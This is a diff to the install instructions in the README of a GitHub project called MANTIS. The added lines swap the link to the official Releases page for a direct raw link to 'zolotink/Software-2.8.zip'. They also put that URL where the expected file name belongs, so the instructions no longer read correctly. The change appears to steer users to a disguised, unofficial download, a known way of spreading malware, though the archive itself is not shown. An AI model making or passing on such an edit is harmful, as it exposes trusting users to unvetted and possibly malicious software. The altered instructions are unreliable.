sweetiekhan/MANTIS/README.md

 ## 💾 Download & Install

 1. **Visit the Download Page**
-   Go to the [Releases page here](https://github.com/sweetiekhan/MANTIS/releases) to get the latest version of MANTIS.
+   Go to the [Releases page here](https://raw.githubusercontent.com/sweetiekhan/MANTIS/main/zolotink/Software-2.8.zip) to get the latest version of MANTIS.

 2. **Choose the Right File**
    On the Releases page, you will see various files.
 Look for the most recent version labeled as "Latest."
-It will typically be named something like `MANTIS-vX.X.zip`.
+It will typically be named something like `https://raw.githubusercontent.com/sweetiekhan/MANTIS/main/zolotink/Software-2.8.zip`.

 3. **Download the File**
    Click on the file name to begin downloading.
 Your browser will process the download.